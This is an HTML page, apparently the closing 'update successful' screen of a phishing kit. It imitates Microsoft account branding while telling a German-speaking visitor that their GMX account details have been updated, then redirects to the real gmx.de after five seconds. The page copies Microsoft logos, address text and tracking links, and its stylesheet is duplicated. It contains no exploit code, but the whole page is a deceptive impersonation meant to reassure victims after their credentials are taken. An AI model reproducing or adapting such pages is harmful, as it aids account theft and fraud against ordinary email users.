﻿<HTML><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Microsoft-Konto Aktualisierung</title>
<meta http-equiv="refresh" content="5; url=https://gmx.de">
<style type="text/css">

?»?@font-face {

    font-family: "Segoe UI Web Light";

    font-style: normal;

    font-weight: 100;

    src: local("Segoe UI Light"), local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}

@font-face {

    font-family:"Segoe UI Web Regular";

    font-style: normal;

    font-weight: normal;

    src: local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}

@font-face {

    font-family: "Segoe UI Web Semibold";

    font-style: normal; 

    font-weight: bold;

    src: local("Segoe UI Semibold"), local("Segoe UI Bold"), local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}



body 

{

    font-family:"Segoe UI Web Light","Segoe UI Light","Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

    margin:0;

    padding:0;

    border:none;

    color:#fff;

    height:100%;

    position:relative;

}



body.hidden {visibility:hidden;}



.ja-jp, .ja-jp h1, .ja-jp h2, .ja-jp p,

.ja-jp a, .ja-jp a:hover, .ja-jp a:visited

{

    font-family:"Meiryo UI",Meiryo,"MS PGothic",Osaka,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.km-kh, .km-kh h1, .km-kh h2, .km-kh p,

.km-kh a .km-kh a:hover, .km-kh a:visited

{

    font-family:"Khmer UI","Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.ko-kr, .ko-kr h1, .ko-kr h2, .ko-kr p,

.ko-kr a, .ko-kr a:hover, .ko-kr a:visited

{

    font-family:"Malgun Gothic",Gulim,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.zh-cn, .zh-cn h1, .zh-cn h2, .zh-cn p,

.zh-hans, .zh-hans h1, .zh-hans h2, .zh-hans p, 

.zh-cn a, .zh-cn a:hover, .zh-cn a:visited 

{

    font-family:"Microsoft Yahei",Verdana,Simsun,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.zh-hant, .zh-hant h1, .zh-hant h2, .zh-hant p,

.zh-hk, .zh-hk h1, .zh-hk h2, .zh-hk p,

.zh-mo, .zh-mo h1, .zh-mo h2, .zh-mo p,

.zh-sg, .zh-sg h1, .zh-sg h2, .zh-sg p,

.zh-tw, .zh-tw h1, .zh-tw h2, .zh-tw p,

.zh-hant a, .zh-hant a:hover, .zh-hant a:visited,

.zh-mo a, .zh-mo a:hover, .zh-mo a:visited,

.zh-sg a, .zh-sg a:hover, .zh-sg a:visited,

.zh-tw a, .zh-tw a:hover, .zh-tw a:visited

{

    font-family:"Microsoft JhengHei", Pmingliu,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



img {border:none;float:left;}

/*div#mboxDefault {visibility:visible;}*/



h1 

{

    font-weight:100;

    color:#fff;

    font-size: 21px;

    line-height:17px;

    float:left;

    padding: 0px 0px 0px 7px;

    margin:0px;

}



h2 

{

    font-weight:100;

    color:#000;

    font-size:22px;

    line-height:22px;

    padding:0px;

    margin:30px 0px 20px 50px;

}







a, a:hover, a:visited

{

    

    font-family:"Segoe UI Web Semibold","Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

    border: 1px #fff;

    color:#fff;

    text-decoration:none;

    display: inline-block;

    font-size: 14px;

    font-weight: 100;

    min-width:70px;

    text-align:center;

    padding: 3px 12px 5px 12px;

    margin:0px 0px 0px 50px;

}



#brand a {

    margin:0px;

    padding: 0px 0px 0 10px;

    height: 40px;

    color:#212121;

}



#brand a:hover {

    opacity: 1.0 !important;

    background-color:rgba(0, 0, 0, 0.18); 

}



iframe

{

    border:solid 0px gray;

}



div#confirm

{

    height:170px;

    width:100%;

    margin:0;

    padding:0px 0px 30px 0px;  

}



div#brand

{

    height: 40px;

    margin:0;

    padding: 0px 0px 0px 10px;  

}



div#brand.newmail {

       



}



iframe#offer {

    min-height:500px;

    min-width:800px;

}



div#container {

    height: auto !important;

    margin: 0 auto -1px;

    min-height: 100%;

}



div#footer {

   border-top:solid 1px #ccc;

   position:fixed;

   bottom:0px;

   overflow:auto;

   left:0px;

   width:100%;

   height:30px;

   background-color:white;

}



#footer span, #footer a {

   font-family:"Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

   font-size:12px;

   padding:3px;

   float:left;

   display:inline;

   min-width:inherit;

   margin:0px;

   padding:7px 10px;

   color:gray;

}





/*Brands*/

.hotmail {background-color:#f89a1e;}

.hotmail a, .hotmail a:hover, .hotmail a:visited, .hotmail a:active {color:#f89a1e;}



.newmail {background-color:#0072C6;}

.newmail a, .newmail a:hover, .newmail a:visited, .newmail a:active {color:#0072C6;}





/*Creative Template*/

div#offer {

    margin:0px 45px 10px 50px;

    padding:0px;

    max-width: 1200px;

    min-height:500px;

    min-width: 640px;   

}



div#offer a#button {

    margin:0px;

    background-color:#cacaca;

}



body.rtl div#brand a {

    margin-right:10px;

}



body.rtl div#confirm h2,

body.rtl div#confirm a#signin

 {

  margin-right:50px;

}



div#confirm a:hover,

div#offer a#button:hover {

	opacity:0.76;

    filter:alpha(opacity=76);

}



div#confirm a.newmail:active,

div#confirm a.hotmail:active,

div#offer a.newmail:active,

div#offer a.hotmail:active

 {

    opacity:1;

    filter:alpha(opacity=100);

    background-color:black;

}



a#follow {

    

    background: transparent url('../images/logo-twitter.png') no-repeat top left;

    padding-left:32px;

    height:24px;

    color:#0072c6;

    margin:0px;

}



body.rtl a#follow {

    background-position: top right;

    padding-left:0px;

    padding-right:32px;

}







div#offer h1, div#offer p {

    color:#808080;

    padding:0;

}



div#offer h1 {

    font-size:40px;

    line-height:50px;

    width:55%;

    *width:auto;/*IE7*/

    display:block;

    margin-bottom:10px;

    float:none;

    overflow-wrap:break-word;

}



div#offer p {   

    display:block;

    font-size:15px;

    width:55%;

    *width:auto;/*IE7*/

    max-width:600px;

}





.smallest div#offer h1  {

    font-size:36px;

}



.smallest div#offer p {

    font-size:15px;

}



div#offer p.additional {

    margin-top:60px;

}



div#offer img {

float:right;

padding:10px;

}



body.rtl div#offer img {

    float:left;

}


</style>
<link rel="stylesheet" type="text/css" href="food/style2.css">
</head>
<body dir="ltr" class="ltr normal en-in">? 
<META content="5; url=https://gmx.de" http-equiv=refresh>
<STYLE type=text/css>

?»?@font-face {

    font-family: "Segoe UI Web Light";

    font-style: normal;

    font-weight: 100;

    src: local("Segoe UI Light"), local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}

@font-face {

    font-family:"Segoe UI Web Regular";

    font-style: normal;

    font-weight: normal;

    src: local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}

@font-face {

    font-family: "Segoe UI Web Semibold";

    font-style: normal; 

    font-weight: bold;

    src: local("Segoe UI Semibold"), local("Segoe UI Bold"), local("Segoe UI"), local("Helvetica Neue");

    unicode-range: U+0000-00FF;

}



body 

{

    font-family:"Segoe UI Web Light","Segoe UI Light","Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

    margin:0;

    padding:0;

    border:none;

    color:#fff;

    height:100%;

    position:relative;

}



body.hidden {visibility:hidden;}



.ja-jp, .ja-jp h1, .ja-jp h2, .ja-jp p,

.ja-jp a, .ja-jp a:hover, .ja-jp a:visited

{

    font-family:"Meiryo UI",Meiryo,"MS PGothic",Osaka,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.km-kh, .km-kh h1, .km-kh h2, .km-kh p,

.km-kh a .km-kh a:hover, .km-kh a:visited

{

    font-family:"Khmer UI","Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.ko-kr, .ko-kr h1, .ko-kr h2, .ko-kr p,

.ko-kr a, .ko-kr a:hover, .ko-kr a:visited

{

    font-family:"Malgun Gothic",Gulim,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.zh-cn, .zh-cn h1, .zh-cn h2, .zh-cn p,

.zh-hans, .zh-hans h1, .zh-hans h2, .zh-hans p, 

.zh-cn a, .zh-cn a:hover, .zh-cn a:visited 

{

    font-family:"Microsoft Yahei",Verdana,Simsun,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



.zh-hant, .zh-hant h1, .zh-hant h2, .zh-hant p,

.zh-hk, .zh-hk h1, .zh-hk h2, .zh-hk p,

.zh-mo, .zh-mo h1, .zh-mo h2, .zh-mo p,

.zh-sg, .zh-sg h1, .zh-sg h2, .zh-sg p,

.zh-tw, .zh-tw h1, .zh-tw h2, .zh-tw p,

.zh-hant a, .zh-hant a:hover, .zh-hant a:visited,

.zh-mo a, .zh-mo a:hover, .zh-mo a:visited,

.zh-sg a, .zh-sg a:hover, .zh-sg a:visited,

.zh-tw a, .zh-tw a:hover, .zh-tw a:visited

{

    font-family:"Microsoft JhengHei", Pmingliu,"Segoe UI","Segoe UI Web Regular","Segoe UI Symbol","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,"sans-serif";

}



img {border:none;float:left;}

/*div#mboxDefault {visibility:visible;}*/



h1 

{

    font-weight:100;

    color:#fff;

    font-size: 21px;

    line-height:17px;

    float:left;

    padding: 0px 0px 0px 7px;

    margin:0px;

}



h2 

{

    font-weight:100;

    color:#000;

    font-size:22px;

    line-height:22px;

    padding:0px;

    margin:30px 0px 20px 50px;

}







a, a:hover, a:visited

{

    

    font-family:"Segoe UI Web Semibold","Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

    border: 1px #fff;

    color:#fff;

    text-decoration:none;

    display: inline-block;

    font-size: 14px;

    font-weight: 100;

    min-width:70px;

    text-align:center;

    padding: 3px 12px 5px 12px;

    margin:0px 0px 0px 50px;

}



#brand a {

    margin:0px;

    padding: 0px 0px 0 10px;

    height: 40px;

    color:#212121;

}



#brand a:hover {

    opacity: 1.0 !important;

    background-color:rgba(0, 0, 0, 0.18); 

}



iframe

{

    border:solid 0px gray;

}



div#confirm

{

    height:170px;

    width:100%;

    margin:0;

    padding:0px 0px 30px 0px;  

}



div#brand

{

    height: 40px;

    margin:0;

    padding: 0px 0px 0px 10px;  

}



div#brand.newmail {

       



}



iframe#offer {

    min-height:500px;

    min-width:800px;

}



div#container {

    height: auto !important;

    margin: 0 auto -1px;

    min-height: 100%;

}



div#footer {

   border-top:solid 1px #ccc;

   position:fixed;

   bottom:0px;

   overflow:auto;

   left:0px;

   width:100%;

   height:30px;

   background-color:white;

}



#footer span, #footer a {

   font-family:"Segoe UI Web Regular","Segoe UI","Helvetica Neue",Arial;

   font-size:12px;

   padding:3px;

   float:left;

   display:inline;

   min-width:inherit;

   margin:0px;

   padding:7px 10px;

   color:gray;

}





/*Brands*/

.hotmail {background-color:#f89a1e;}

.hotmail a, .hotmail a:hover, .hotmail a:visited, .hotmail a:active {color:#f89a1e;}



.newmail {background-color:#0072C6;}

.newmail a, .newmail a:hover, .newmail a:visited, .newmail a:active {color:#0072C6;}





/*Creative Template*/

div#offer {

    margin:0px 45px 10px 50px;

    padding:0px;

    max-width: 1200px;

    min-height:500px;

    min-width: 640px;   

}



div#offer a#button {

    margin:0px;

    background-color:#cacaca;

}



body.rtl div#brand a {

    margin-right:10px;

}



body.rtl div#confirm h2,

body.rtl div#confirm a#signin

 {

  margin-right:50px;

}



div#confirm a:hover,

div#offer a#button:hover {

	opacity:0.76;

    filter:alpha(opacity=76);

}



div#confirm a.newmail:active,

div#confirm a.hotmail:active,

div#offer a.newmail:active,

div#offer a.hotmail:active

 {

    opacity:1;

    filter:alpha(opacity=100);

    background-color:black;

}



a#follow {

    

    background: transparent url('../chrome://global/skin/media/imagedoc-darknoise.png') no-repeat top left;

    padding-left:32px;

    height:24px;

    color:#0072c6;

    margin:0px;

}



body.rtl a#follow {

    background-position: top right;

    padding-left:0px;

    padding-right:32px;

}







div#offer h1, div#offer p {

    color:#808080;

    padding:0;

}



div#offer h1 {

    font-size:40px;

    line-height:50px;

    width:55%;

    *width:auto;/*IE7*/

    display:block;

    margin-bottom:10px;

    float:none;

    overflow-wrap:break-word;

}



div#offer p {   

    display:block;

    font-size:15px;

    width:55%;

    *width:auto;/*IE7*/

    max-width:600px;

}





.smallest div#offer h1  {

    font-size:36px;

}



.smallest div#offer p {

    font-size:15px;

}



div#offer p.additional {

    margin-top:60px;

}



div#offer img {

float:right;

padding:10px;

}



body.rtl div#offer img {

    float:left;

}


</STYLE>
<LINK rel=stylesheet type=text/css href="food/style2.css">
<DIV id=confirm>
<TABLE>
<TBODY>
<TR>
<TD><BR>
<H2><IMG class=irc_rii onload="typeof google==='object'&amp;&amp;google.aft&amp;&amp;google.aft(this)" style="HEIGHT: 87px; WIDTH: 193px; MARGIN-TOP: 0px; MARGIN-LEFT: 0px; MARGIN-RIGHT: 0px" alt="Related image" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQgw-NrVLSfz2MeBpE4wH3fVImGSwzYhStfCx2Ns3pYrvUDULLC" data-iml="1567003561972"></H2>
<P>&nbsp;</P>
<H2>&nbsp;</H2>
<H2>&nbsp;</H2>
<H2>AKTUALISIERUNG ERFOLGREICH...<BR><BR>Ihr GMX-Konto informationen wurden aktualisiert..</H2></TD></TR></TBODY></TABLE></DIV>
<DIV id=mboxDefault class=mboxDefault style="DISPLAY: block; VISIBILITY: visible">
<DIV id=offer>
<DIV id=mboxMarker-default-PROD-outlook_signout-0 style="DISPLAY: none; VISIBILITY: hidden">
<TABLE style="FONT-SIZE: 0px; FONT-FAMILY: Arial, Helvetica, sans-serif; WIDTH: 550px; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAPSE: collapse; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(255,255,255); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit" cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD style='FONT-SIZE: 10px; FONT-FAMILY: "Segoe UI", "Segoe UI Regular", SUWR, Arial, sans-serif; COLOR: rgb(107,107,107); PADDING-BOTTOM: 0px; PADDING-TOP: 10px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 14px; PADDING-RIGHT: 0px' align=left>Diese E-Mail wurde von einem nicht überwachten Postfach aus gesendet.<BR><A style="BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; WHITE-SPACE: nowrap; BORDER-BOTTOM: 0px; COLOR: rgb(107,107,107); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; font-stretch: inherit" href="https://mmed.microsoft.com/api/event/?q=Jsg6SONox4MnQVVVlNxdFEijoq%2FpyiMdwHVSOef97E087eCx1qbnECKHXITPuYbIiTP%2FqZHRd%2BDWo05O7vPDHNQDI9%2FDJJ9Wwk7GTWUlxlPC1Uu1F3yTzqEStl%2B7wXAyJ2%2F%2FILtFZVZOAKRXtF461UMb8ZKcFt9XdJbXXvd%2F9y0lb6B1mmvyVPxpvaTSCbxJ1MXHmnRpvIjFUVEZQw%2FA5yplzaZL059AhIa%2BYChXojjHXADZucAuFA4bxy5pxfg2VkjNZz9KBuOCdtlKinoPXl21dQGxfAyOm8498J3OHAfHeD93XKDFjgR8i2O37R6GRrkrsnZdds%2FSPzCDF0iBn04rzCSweyLSOtJSoU2tR33d9i5Xx1S4n4N5IwUZP1RP%2FWjKHR7m0IAB1OsuzKgfyN4o8osejGOvRzSUDK7NTQD8xgo%3D" rel="noopener noreferrer" target=_blank><SPAN><STRONG><U>Datenschutzerklärung</U></STRONG></SPAN></A>&nbsp;|&nbsp;<A style="BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; WHITE-SPACE: nowrap; BORDER-BOTTOM: 0px; COLOR: rgb(107,107,107); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; font-stretch: inherit" href="https://mmed.microsoft.com/api/event/?q=DaTiMGiIxOIruJAKrel3QxBuO1ubI2U4O8jRySQngEj78YPQia6jeBeWqwByVm1abZZ9zcL5t%2BDsiTpYynA3z%2ByIxaKxNVGxJGIe62iMWN%2FtRFT73enIQOahO2J08TISfmUj7IFnuveFgzf7EBgJsv%2BXYt%2BXOlyUa6EMN8msrtn%2FNTb8qcEOFxXp3iH9Q7CQvoy6waLtpZ7t0jfFrVYbb2oTmiF50tWC%2F2%2FNnEDM0xkVkw37EDXgVcFnrDhksx%2Bj58pee8crJipV1lcb68QdMqUIJoS205KTwQ%2BMjVPWU%2FIzJfAsaksjmdG60uAh5%2Fz2t2ziTA12RrV%2BJOITlC4Bdn43lHCLIygN%2F9QCphPNSVnxVm8YKyWblLWCdm2fX8b7Rto0%2FxdaUCEiq6Q5MOTW9YwjuCmFPDoFW5nbKItlcJTM8sI%3D" rel="noopener noreferrer" target=_blank><SPAN><STRONG><U>Impressum</U></STRONG></SPAN></A><BR><BR><SPAN class=gmail-mark02hckh2x4 style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM: 0px; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px">Microsoft</SPAN>&nbsp;Corporation, One&nbsp;<SPAN class=gmail-mark02hckh2x4 style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM: 0px; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px">Microsoft</SPAN>&nbsp;Way, Redmond, WA 98052 USA</TD></TR>
<TR>
<TD style="FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; PADDING-BOTTOM: 0px; PADDING-TOP: 15px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" align=left><A style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM: 0px; COLOR: rgb(17,85,204); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" href="https://mmed.microsoft.com/api/event/?q=9O9OZj%2Fidd3rKTlAIz0vzUwwwbOEC68tv1Td6%2BHDZI5JkqPbt8HXzkNMpnoC4orWPhjXt7PWdavjSYd6X7oV5sN58L47EJiOIJaDzlBlzWNmAHpwrLpMiI7vF7hvS447oWG3SA5W74Oel%2F%2BNAP%2BakPuJFXh8psuFwngMjlCNKGEWla9KFwLpjgYGNiXBS9cjWDfsQgQy49SOBD8XP5xNwq56C4zkZoRxJlz3UXNfS%2BOfxvOuOL8wqDHwSCYnLqMeepez3zIvGCN3q%2B3LjnHeioWQ8qmf%2Bc7gvqZV3aDbVCxpaGYiQkaHWvgh6uI%2B1EGS%2FY%2FC2nXFMrZ%2Bnl5tazp%2Bxh1nt2zNM6SfFEv%2FTtcCLuFMvSuvcUsJeqKIN3cwxVomlLM8LiCRGmIw05WEdoP9CHe1%2B8h%2F4mFL%2B30lrSMogsYXcIs%3D" rel="noopener noreferrer" target=_blank><IMG style="BORDER-TOP: 0px; BORDER-RIGHT: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM: 0px; COLOR: ; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; BORDER-LEFT: 0px; MARGIN: 0px; DISPLAY: inline-block; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px" border=0 alt=Microsoft src="https://asgcdn.azureedge.net/2018-10-msa-eu-update/images/en-us/60104_msaupdateemail_logo-mswhite@2x.png" width=97 height=21></A></TD></TR></TBODY></TABLE></DIV></DIV></DIV>
<DIV id=brand class=newmail></DIV></BODY></HTML>